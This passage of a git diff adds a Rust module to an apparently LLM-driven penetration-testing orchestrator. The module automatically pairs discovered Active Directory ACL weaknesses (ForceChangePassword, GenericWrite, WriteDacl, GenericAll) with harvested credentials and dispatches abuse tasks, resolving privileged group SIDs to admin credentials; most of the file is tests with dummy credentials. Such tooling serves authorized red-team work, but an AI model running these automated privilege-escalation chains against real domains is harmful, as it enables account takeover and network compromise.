!fab_work.unwrap().is_under_enumerated, + "domain with >= 3 users should not be marked under-enumerated" + ); + } +} diff --git a/ares-cli/src/orchestrator/automation/dacl_abuse.rs b/ares-cli/src/orchestrator/automation/dacl_abuse.rs new file mode 100644 index 00000000..dbc40d05 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/dacl_abuse.rs @@ -0,0 +1,1192 @@ +//! auto_dacl_abuse -- direct ACL abuse for known attack paths. +//! +//! Unlike acl_chain_follow (which requires BloodHound to populate acl_chains), +//! this module proactively dispatches known ACL abuse techniques when: +//! - A credential is available for a user known to have dangerous permissions +//! - The target object exists in the domain +//! +//! Covers: ForceChangePassword, GenericWrite (targeted Kerberoast), WriteDacl, +//! WriteOwner, GenericAll. Each abuse type maps to a specific tool invocation +//! (e.g., net rpc password for ForceChangePassword, bloodyAD for GenericWrite). + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::dedup::is_ghost_machine_account; +use crate::orchestrator::dispatcher::{Dispatcher, SubmissionOutcome}; +use crate::orchestrator::state::*; + +/// Dispatches ACL abuse when matching credentials + bloodhound paths exist. +/// Interval: 30s. 
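+/// Dedup is marked on Submitted and Deferred outcomes but not on Dropped,
+/// so dropped work items are reconsidered on the next tick.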
+pub async fn auto_dacl_abuse(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) {
+    let mut interval = tokio::time::interval(Duration::from_secs(30));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("dacl_abuse") {
+            continue;
+        }
+
+        let work: Vec<DaclWork> = {
+            let state = dispatcher.state.read().await;
+            collect_dacl_work(&state)
+        };
+
+        for item in work {
+            let payload = json!({
+                "technique": "dacl_abuse",
+                "acl_type": item.vuln_type,
+                "vuln_id": item.vuln_id,
+                "source_user": item.source_user,
+                "target_user": item.target_user,
+                "target_ip": item.dc_ip,
+                "domain": item.domain,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+            });
+
+            let priority = dispatcher.effective_priority("dacl_abuse");
+            // Mark dedup on Submitted OR Deferred to prevent the 30s tick from
+            // re-emitting identical work each cycle and bloating the deferred
+            // ZSET past its per-type cap (which silently drops entries). Only
+            // skip dedup on Dropped — those need to be reconsidered next tick.
+            let mark_dedup = match dispatcher
+                .throttled_submit_outcome("acl_chain_step", "acl", payload, priority)
+                .await
+            {
+                Ok(SubmissionOutcome::Submitted(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        vuln_id = %item.vuln_id,
+                        acl_type = %item.vuln_type,
+                        source = %item.source_user,
+                        target = %item.target_user,
+                        "DACL abuse dispatched"
+                    );
+                    true
+                }
+                Ok(SubmissionOutcome::Deferred) => {
+                    debug!(vuln_id = %item.vuln_id, "DACL abuse deferred (will retry via deferred drain)");
+                    true
+                }
+                Ok(SubmissionOutcome::Dropped) => {
+                    debug!(vuln_id = %item.vuln_id, "DACL abuse dropped (will reconsider next tick)");
+                    false
+                }
+                Err(e) => {
+                    warn!(err = %e, vuln_id = %item.vuln_id, "Failed to dispatch DACL abuse");
+                    false
+                }
+            };
+            if mark_dedup {
+                {
+                    let mut state = dispatcher.state.write().await;
+                    state.mark_processed(DEDUP_DACL_ABUSE, item.dedup_key.clone());
+                }
+                let _ = dispatcher
+                    .state
+                    .persist_dedup(&dispatcher.queue, DEDUP_DACL_ABUSE, &item.dedup_key)
+                    .await;
+            }
+        }
+    }
+}
+
+/// Collect DACL abuse work items from state without holding async locks.
+///
+/// Extracted for testability: scans `discovered_vulnerabilities` for ACL-type
+/// vulns that have a matching credential and haven't been processed yet.
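+///
+/// A matching vuln typically carries details like
+/// `{"source": "admin", "target": "victim", "source_domain": "contoso.local"}`;
+/// the keys fall back through source/source_user/from and
+/// target/target_user/to (the specific values here are illustrative).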
+fn collect_dacl_work(state: &StateInner) -> Vec<DaclWork> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    // Check discovered_vulnerabilities for ACL-related vulns
+    // (populated by BloodHound analysis or recon agents)
+    for vuln in state.discovered_vulnerabilities.values() {
+        let vtype = vuln.vuln_type.to_lowercase();
+
+        let is_acl_vuln = vtype.contains("forcechangepassword")
+            || vtype.contains("genericwrite")
+            || vtype.contains("writedacl")
+            || vtype.contains("writeowner")
+            || vtype.contains("genericall")
+            || vtype.contains("self_membership")
+            || vtype.contains("write_membership")
+            || vtype.contains("writeproperty")
+            || vtype.contains("allextendedrights")
+            || vtype.contains("addmember")
+            || vtype.contains("addself");
+
+        if !is_acl_vuln {
+            continue;
+        }
+
+        if state.exploited_vulnerabilities.contains(&vuln.vuln_id) {
+            continue;
+        }
+
+        let dedup_key = format!("dacl:{}", vuln.vuln_id);
+        if state.is_processed(DEDUP_DACL_ABUSE, &dedup_key) {
+            continue;
+        }
+
+        let target_name = vuln
+            .details
+            .get("target")
+            .or_else(|| vuln.details.get("target_user"))
+            .or_else(|| vuln.details.get("to"))
+            .and_then(|v| v.as_str())
+            .unwrap_or("");
+        if is_ghost_machine_account(target_name) {
+            debug!(
+                vuln_id = %vuln.vuln_id,
+                target = %target_name,
+                "Skipping ACL abuse for ghost machine account target"
+            );
+            continue;
+        }
+
+        // Extract source user from vuln details
+        let source_user = vuln
+            .details
+            .get("source")
+            .or_else(|| vuln.details.get("source_user"))
+            .or_else(|| vuln.details.get("from"))
+            .and_then(|v| v.as_str())
+            .unwrap_or("");
+
+        let source_domain = vuln
+            .details
+            .get("source_domain")
+            .or_else(|| vuln.details.get("domain"))
+            .and_then(|v| v.as_str())
+            .unwrap_or("");
+
+        if source_user.is_empty() {
+            continue;
+        }
+
+        // Find matching credential.
+        //
+        // BloodHound often emits ACL edges with SID principals (e.g. for
+        // well-known groups like Enterprise Admins). When `source` is a SID,
+        // resolve to any privileged credential in the source's domain so the
+        // ACL chain can still be exercised.
+        let cred = state
+            .credentials
+            .iter()
+            .find(|c| {
+                c.username.to_lowercase() == source_user.to_lowercase()
+                    && (source_domain.is_empty()
+                        || c.domain.to_lowercase() == source_domain.to_lowercase())
+            })
+            .cloned()
+            .or_else(|| resolve_sid_principal(state, source_user, source_domain));
+
+        if let Some(cred) = cred {
+            let target_user = vuln
+                .details
+                .get("target")
+                .or_else(|| vuln.details.get("target_user"))
+                .or_else(|| vuln.details.get("to"))
+                .and_then(|v| v.as_str())
+                .unwrap_or("")
+                .to_string();
+
+            let dc_ip = state
+                .domain_controllers
+                .get(&cred.domain.to_lowercase())
+                .cloned()
+                .unwrap_or_default();
+
+            // When BloodHound emitted the source as a raw SID and we resolved
+            // it via `resolve_sid_principal`, surface the resolved credential's
+            // SAM account name as `source_user` — not the SID. Tool schemas
+            // require a username for credential injection by `(user, domain)`,
+            // and the LLM otherwise echoes the SID as the auth principal.
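+            // e.g. a source of "S-1-5-21-111-222-333-519" (Enterprise Admins)
+            // dispatches as the resolved admin credential's username.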
+            let dispatched_source_user = if source_user.starts_with("S-1-5-21-") {
+                cred.username.clone()
+            } else {
+                source_user.to_string()
+            };
+
+            items.push(DaclWork {
+                dedup_key,
+                vuln_id: vuln.vuln_id.clone(),
+                vuln_type: vtype,
+                source_user: dispatched_source_user,
+                target_user,
+                domain: cred.domain.clone(),
+                dc_ip,
+                credential: cred,
+            });
+        }
+    }
+
+    items
+}
+
+struct DaclWork {
+    dedup_key: String,
+    vuln_id: String,
+    vuln_type: String,
+    source_user: String,
+    target_user: String,
+    domain: String,
+    dc_ip: String,
+    credential: ares_core::models::Credential,
+}
+
+/// RIDs of well-known privileged groups whose membership is owned by privileged
+/// credentials in the same domain. Resolving a SID-typed source to "any DA-cred
+/// in this domain" is correct for these RIDs because the abuse only requires
+/// *a* member of the group, not a specific principal.
+fn is_privileged_well_known_rid(rid: u32) -> bool {
+    matches!(
+        rid,
+        512 // Domain Admins
+        | 518 // Schema Admins
+        | 519 // Enterprise Admins
+        | 520 // Group Policy Creator Owners
+        | 526 // Key Admins
+        | 527 // Enterprise Key Admins
+    )
+}
+
+/// When the ACL edge source is a SID (typically a well-known group), resolve
+/// it to a credential of an actual member.
+///
+/// Strategy:
+/// 1. Parse `S-1-5-21-X-Y-Z-RID` and extract the domain SID prefix and RID.
+/// 2. Reverse-look up the domain via `state.domain_sids` (or fall back to
+///    `source_domain` from the vuln details).
+/// 3. For privileged well-known RIDs, return any `is_admin` credential in
+///    that domain. As a last resort, return any credential in the domain.
+fn resolve_sid_principal(
+    state: &StateInner,
+    source: &str,
+    source_domain: &str,
+) -> Option<ares_core::models::Credential> {
+    if !source.starts_with("S-1-5-21-") {
+        return None;
+    }
+    let (prefix, rid_str) = source.rsplit_once('-')?;
+    let rid: u32 = rid_str.parse().ok()?;
+
+    let resolved_domain = state
+        .domain_sids
+        .iter()
+        .find(|(_, sid)| sid.eq_ignore_ascii_case(prefix))
+        .map(|(d, _)| d.to_lowercase())
+        .or_else(|| {
+            if source_domain.is_empty() {
+                None
+            } else {
+                Some(source_domain.to_lowercase())
+            }
+        })?;
+
+    if !is_privileged_well_known_rid(rid) {
+        return None;
+    }
+
+    let admin = state
+        .credentials
+        .iter()
+        .find(|c| c.is_admin && c.domain.to_lowercase() == resolved_domain)
+        .cloned();
+    if admin.is_some() {
+        return admin;
+    }
+
+    state
+        .credentials
+        .iter()
+        .find(|c| c.domain.to_lowercase() == resolved_domain)
+        .cloned()
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn dedup_key_format() {
+        let key = format!("dacl:{}", "vuln-acl-001");
+        assert_eq!(key, "dacl:vuln-acl-001");
+    }
+
+    #[test]
+    fn dedup_set_name() {
+        assert_eq!(DEDUP_DACL_ABUSE, "dacl_abuse");
+    }
+
+    #[test]
+    fn acl_vuln_type_matching() {
+        let positives = [
+            "ForceChangePassword",
+            "GenericWrite",
+            "WriteDacl",
+            "WriteOwner",
+            "GenericAll",
+            "self_membership",
+            "write_membership",
+            "WriteProperty",
+            "AllExtendedRights",
+            "AddMember",
+            "AddSelf",
+            "SomePrefix_forcechangepassword_suffix",
+        ];
+        for t in &positives {
+            let vtype = t.to_lowercase();
+            let is_acl_vuln = vtype.contains("forcechangepassword")
+                || vtype.contains("genericwrite")
+                || vtype.contains("writedacl")
+                || vtype.contains("writeowner")
+                || vtype.contains("genericall")
+                || vtype.contains("self_membership")
+                || vtype.contains("write_membership")
+                || vtype.contains("writeproperty")
+                || vtype.contains("allextendedrights")
+                || vtype.contains("addmember")
+                || vtype.contains("addself");
+            assert!(is_acl_vuln,
"{t} should match as ACL vuln"); + } + } + + #[test] + fn non_acl_vuln_types_rejected() { + let negatives = [ + "smb_signing_disabled", + "mssql_access", + "zerologon", + "esc1", + "kerberoast", + ]; + for t in &negatives { + let vtype = t.to_lowercase(); + let is_acl_vuln = vtype.contains("forcechangepassword") + || vtype.contains("genericwrite") + || vtype.contains("writedacl") + || vtype.contains("writeowner") + || vtype.contains("genericall") + || vtype.contains("self_membership") + || vtype.contains("write_membership"); + assert!(!is_acl_vuln, "{t} should NOT match as ACL vuln"); + } + } + + #[test] + fn source_user_extraction_keys() { + // Verify the fallback chain for source user extraction + let details = serde_json::json!({ + "source": "admin", + "source_user": "admin2", + "from": "admin3", + }); + let source = details + .get("source") + .or_else(|| details.get("source_user")) + .or_else(|| details.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source, "admin"); + + // Fallback to source_user + let details2 = serde_json::json!({ + "source_user": "admin2", + }); + let source2 = details2 + .get("source") + .or_else(|| details2.get("source_user")) + .or_else(|| details2.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source2, "admin2"); + + // No source returns empty + let details3 = serde_json::json!({}); + let source3 = details3 + .get("source") + .or_else(|| details3.get("source_user")) + .or_else(|| details3.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source3, ""); + } + + #[test] + fn source_domain_extraction_keys() { + let details = serde_json::json!({"source_domain": "contoso.local"}); + let source_domain = details + .get("source_domain") + .or_else(|| details.get("domain")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source_domain, "contoso.local"); + + let details2 = serde_json::json!({"domain": "fabrikam.local"}); + let source_domain2 = details2 + .get("source_domain") + .or_else(|| details2.get("domain")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source_domain2, "fabrikam.local"); + + let details3 = serde_json::json!({}); + let source_domain3 = details3 + .get("source_domain") + .or_else(|| details3.get("domain")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source_domain3, ""); + } + + #[test] + fn target_user_extraction_keys() { + let details = serde_json::json!({"target": "victim", "target_user": "v2", "to": "v3"}); + let target = details + .get("target") + .or_else(|| details.get("target_user")) + .or_else(|| details.get("to")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(target, "victim"); + + let details2 = serde_json::json!({"target_user": "v2"}); + let target2 = details2 + .get("target") + .or_else(|| details2.get("target_user")) + .or_else(|| details2.get("to")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(target2, "v2"); + + let details3 = serde_json::json!({"to": "v3"}); + let target3 = details3 + .get("target") + .or_else(|| details3.get("target_user")) + .or_else(|| details3.get("to")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(target3, "v3"); + } + + #[test] + fn ghost_machine_targets_rejected() { + assert!(is_ghost_machine_account("WIN-DPPJMLU3XS6$")); + } + + #[test] + fn credential_matching_with_domain() { + let source_user = "admin"; + let source_domain = "contoso.local"; + let cred_username = "Admin"; + let cred_domain = "CONTOSO.LOCAL"; + + let matches = cred_username.to_lowercase() == 
source_user.to_lowercase() + && (source_domain.is_empty() + || cred_domain.to_lowercase() == source_domain.to_lowercase()); + assert!(matches); + } + + #[test] + fn credential_matching_without_domain() { + let source_user = "admin"; + let source_domain = ""; + let cred_username = "admin"; + let cred_domain = "contoso.local"; + + let matches = cred_username.to_lowercase() == source_user.to_lowercase() + && (source_domain.is_empty() + || cred_domain.to_lowercase() == source_domain.to_lowercase()); + assert!(matches); + } + + #[test] + fn credential_matching_wrong_user() { + let source_user = "admin"; + let source_domain = "contoso.local"; + let cred_username = "jdoe"; + let cred_domain = "contoso.local"; + + let matches = cred_username.to_lowercase() == source_user.to_lowercase() + && (source_domain.is_empty() + || cred_domain.to_lowercase() == source_domain.to_lowercase()); + assert!(!matches); + } + + #[test] + fn credential_matching_wrong_domain() { + let source_user = "admin"; + let source_domain = "contoso.local"; + let cred_username = "admin"; + let cred_domain = "fabrikam.local"; + + let matches = cred_username.to_lowercase() == source_user.to_lowercase() + && (source_domain.is_empty() + || cred_domain.to_lowercase() == source_domain.to_lowercase()); + assert!(!matches); + } + + #[test] + fn dacl_payload_structure() { + let payload = serde_json::json!({ + "technique": "dacl_abuse", + "acl_type": "forcechangepassword", + "vuln_id": "vuln-acl-001", + "source_user": "admin", + "target_user": "victim", + "target_ip": "192.168.58.10", + "domain": "contoso.local", + "credential": { + "username": "admin", + "password": "P@ssw0rd!", + "domain": "contoso.local", + }, + }); + assert_eq!(payload["technique"], "dacl_abuse"); + assert_eq!(payload["acl_type"], "forcechangepassword"); + assert_eq!(payload["source_user"], "admin"); + assert_eq!(payload["target_user"], "victim"); + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn acl_vuln_type_case_insensitive() { + for t in [ + "ForceChangePassword", + "FORCECHANGEPASSWORD", + "forcechangepassword", + ] { + let vtype = t.to_lowercase(); + assert!(vtype.contains("forcechangepassword"), "{t} should match"); + } + } + + #[test] + fn source_user_from_key() { + let details = serde_json::json!({"from": "svc_account"}); + let source = details + .get("source") + .or_else(|| details.get("source_user")) + .or_else(|| details.get("from")) + .and_then(|v| v.as_str()) + .unwrap_or(""); + assert_eq!(source, "svc_account"); + } + + // -- collect_dacl_work integration tests -- + + use crate::orchestrator::state::SharedState; + use ares_core::models::{Credential, VulnerabilityInfo}; + use std::collections::HashMap; + + fn make_credential(username: &str, domain: &str) -> Credential { + Credential { + id: format!("cred-{username}"), + username: username.to_string(), + password: "P@ssw0rd!".to_string(), // pragma: allowlist secret + domain: domain.to_string(), + source: String::new(), + discovered_at: None, + is_admin: false, + parent_id: None, + attack_step: 0, + } + } + + fn make_vuln( + vuln_id: &str, + vuln_type: &str, + details: HashMap, + ) -> VulnerabilityInfo { + VulnerabilityInfo { + vuln_id: vuln_id.to_string(), + vuln_type: vuln_type.to_string(), + target: "192.168.58.10".to_string(), + discovered_by: "bloodhound".to_string(), + discovered_at: chrono::Utc::now(), + details, + recommended_agent: String::new(), + priority: 5, + } + } + + fn acl_details(source: &str, target: &str, domain: &str) -> HashMap { + let mut m = 
HashMap::new(); + m.insert("source".to_string(), serde_json::json!(source)); + m.insert("target".to_string(), serde_json::json!(target)); + m.insert("source_domain".to_string(), serde_json::json!(domain)); + m + } + + #[tokio::test] + async fn collect_empty_state_no_work() { + let shared = SharedState::new("test".into()); + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_credentials_no_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-001", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_forcechangepassword_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-001", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "forcechangepassword"); + assert_eq!(work[0].source_user, "admin"); + assert_eq!(work[0].target_user, "victim"); + assert_eq!(work[0].domain, "contoso.local"); + } + + #[tokio::test] + async fn collect_genericwrite_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("svc_sql", "contoso.local")); + let details = acl_details("svc_sql", "targetuser", "contoso.local"); + let vuln = make_vuln("vuln-gw-001", "GenericWrite", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "genericwrite"); + } + + #[tokio::test] + async fn collect_writedacl_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("operator", "contoso.local")); + let details = acl_details("operator", "targetobj", "contoso.local"); + let vuln = make_vuln("vuln-wd-001", "WriteDacl", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "writedacl"); + } + + #[tokio::test] + async fn collect_writeowner_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("operator", "contoso.local")); + let details = acl_details("operator", "targetobj", "contoso.local"); + let vuln = make_vuln("vuln-wo-001", "WriteOwner", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "writeowner"); + } + + #[tokio::test] + async fn 
collect_genericall_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-ga-001", "GenericAll", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "genericall"); + } + + #[tokio::test] + async fn collect_self_membership_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("user1", "contoso.local")); + let details = acl_details("user1", "Domain Admins", "contoso.local"); + let vuln = make_vuln("vuln-sm-001", "self_membership", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "self_membership"); + } + + #[tokio::test] + async fn collect_sid_source_resolves_via_domain_admin() { + // BloodHound emits ACL edges where the source is a SID for a + // well-known group (e.g. Enterprise Admins ending in -519). The + // resolver should pick any DA-marked credential in the same domain. + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + let mut da = make_credential("admin", "contoso.local"); + da.is_admin = true; + state.credentials.push(da); + state.domain_sids.insert( + "contoso.local".to_string(), + "S-1-5-21-111-222-333".to_string(), + ); + let details = acl_details("S-1-5-21-111-222-333-519", "victim", "contoso.local"); + let vuln = make_vuln("vuln-sid-001", "GenericAll", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].vuln_type, "genericall"); + // source_user must be the resolved cred's SAM, not the raw SID — the + // credential_resolver looks up password by `(username, domain)`, and + // a SID never matches a credential record. + assert_eq!(work[0].source_user, "admin"); + } + + #[tokio::test] + async fn collect_sid_source_non_privileged_rid_skipped() { + // Only well-known privileged RIDs are auto-resolved; an arbitrary + // user SID (RID >= 1000) requires an exact match. 
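+        // Illustrative sketch of that rule (assumed shape; `sid` is a
+        // hypothetical &str here): take the SID's trailing RID component and
+        // auto-resolve only the well-known admin RIDs:
+        //   let rid = sid.rsplit('-').next().and_then(|s| s.parse::<u32>().ok());
+        //   let auto_resolvable = matches!(rid, Some(512) | Some(519)); // DA / EA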
+ let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + let mut da = make_credential("admin", "contoso.local"); + da.is_admin = true; + state.credentials.push(da); + state.domain_sids.insert( + "contoso.local".to_string(), + "S-1-5-21-111-222-333".to_string(), + ); + let details = acl_details("S-1-5-21-111-222-333-1105", "victim", "contoso.local"); + let vuln = make_vuln("vuln-sid-002", "GenericAll", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_write_membership_produces_work() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("user1", "contoso.local")); + let details = acl_details("user1", "Domain Admins", "contoso.local"); + let vuln = make_vuln("vuln-wm-001", "write_membership", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].vuln_type, "write_membership"); + } + + #[tokio::test] + async fn collect_non_acl_vuln_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "dc01", "contoso.local"); + let vuln = make_vuln("vuln-smb-001", "smb_signing_disabled", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_already_exploited_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-002", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + state + .exploited_vulnerabilities + .insert("vuln-fcp-002".to_string()); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_already_processed_dedup_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-003", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + state.mark_processed(DEDUP_DACL_ABUSE, "dacl:vuln-fcp-003".to_string()); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_source_user_empty_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let mut details = HashMap::new(); + details.insert("target".to_string(), serde_json::json!("victim")); + let vuln = make_vuln("vuln-fcp-004", "ForceChangePassword", details); + state + .discovered_vulnerabilities + 
.insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_no_matching_credential_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("otheruser", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-005", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_case_insensitive_credential_match() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("Admin", "CONTOSO.LOCAL")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-006", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].source_user, "admin"); + } + + #[tokio::test] + async fn collect_dc_ip_resolved_from_domain_controllers() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + state + .domain_controllers + .insert("contoso.local".to_string(), "192.168.58.10".to_string()); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-007", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + } + + #[tokio::test] + async fn collect_dc_ip_empty_when_no_dc_mapping() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-008", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].dc_ip, ""); + } + + #[tokio::test] + async fn collect_credential_domain_mismatch_skipped() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "fabrikam.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-fcp-009", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert!(work.is_empty()); + } + + #[tokio::test] + async fn collect_empty_source_domain_matches_any_cred_domain() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "fabrikam.local")); + let mut details = HashMap::new(); + 
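+        // "source_domain" is deliberately omitted: the matcher treats an empty
+        // source domain as a wildcard, so the fabrikam.local credential still
+        // qualifies.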
details.insert("source".to_string(), serde_json::json!("admin")); + details.insert("target".to_string(), serde_json::json!("victim")); + let vuln = make_vuln("vuln-fcp-010", "ForceChangePassword", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "fabrikam.local"); + } + + #[tokio::test] + async fn collect_multiple_vulns_produces_multiple_work_items() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + + for (i, vtype) in ["ForceChangePassword", "GenericAll", "WriteDacl"] + .iter() + .enumerate() + { + let details = acl_details("admin", &format!("target{i}"), "contoso.local"); + let vuln = make_vuln(&format!("vuln-multi-{i}"), vtype, details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + } + + let state = shared.read().await; + let work = collect_dacl_work(&state); + assert_eq!(work.len(), 3); + } + + #[tokio::test] + async fn collect_dedup_key_format_matches() { + let shared = SharedState::new("test".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "contoso.local")); + let details = acl_details("admin", "victim", "contoso.local"); + let vuln = make_vuln("vuln-dk-001", "GenericAll", details); + state + .discovered_vulnerabilities + .insert(vuln.vuln_id.clone(), vuln); + } + + let state = shared.read().await; 